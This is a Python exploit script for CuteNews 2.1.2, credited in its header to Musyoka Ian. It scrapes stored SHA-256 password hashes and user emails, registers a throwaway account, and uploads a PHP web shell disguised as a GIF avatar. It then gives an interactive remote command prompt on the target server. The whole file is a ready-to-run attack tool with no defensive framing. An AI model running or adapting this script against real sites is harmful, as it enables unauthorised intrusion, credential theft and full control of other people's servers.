#!/bin/env python3
# Author: Musyoka Ian

import requests
import io
import random
import re
import string
import sys
from base64 import b64decode


banner = """


           _____     __      _  __                     ___   ___  ___ 
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                ___  _________                        
                               / _ \/ ___/ __/                        
                              / , _/ /__/ _/                          
                             /_/|_|\___/___/                          
                                                                      

                                                                                                                                                   
"""
print (banner)
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
            print ("[-] No hashes were found skipping!!!")
            return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass
def userenum():
    global ip, sess
    crude_emails = sess.get(f"{ip}").text
    emails = re.findall('<a href="mailto:(.*?)"', crude_emails)
    for i in set(emails):
        print(i)
def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    #return userpass
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()
def login():
    username = input('    Username ==> ')
    password = input('    Password ==> ')
    send_creds = {"action" : "dologin", "username" : username, "password" : password}
    valid = sess.post(f"{ip}/CuteNews/index.php", data = send_creds, allow_redirects = False)
    if "Please Login" in valid.text:
        print ("[-] Login Failure please validate your credentials")
        print ("[-] Sorry but you can't proceed any further \n1. You can try and register a user\n2. Find valid credentials")
        sys.exit()
    else:
        print("[+] Login was successfull")
def send_payload(payload):
    global ip, sess
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")

    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    print()
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sess.cookies.clear()
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())
    #return logged_user

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("================================================================")
    print()
    print ("================================================================\nPossible users\n================================================================")
    userenum()
    print("================================================================")
    print()
    func = input("Do You Have a valid credential: [yes] or [no] ==> ").casefold()
    print()
    if func == "yes":
        print ("[*] Please enter the credentials below")
        login()
    elif func == "no":
        print ("=============================\nRegistering a users\n=============================")
        print ("[*] Trying to register a user if the functonality is enabled\n    You'll get a shell")
        register()
    print()
    print("================================================================\nSending Payload\n================================================================")
    send_payload(payload)
    print ()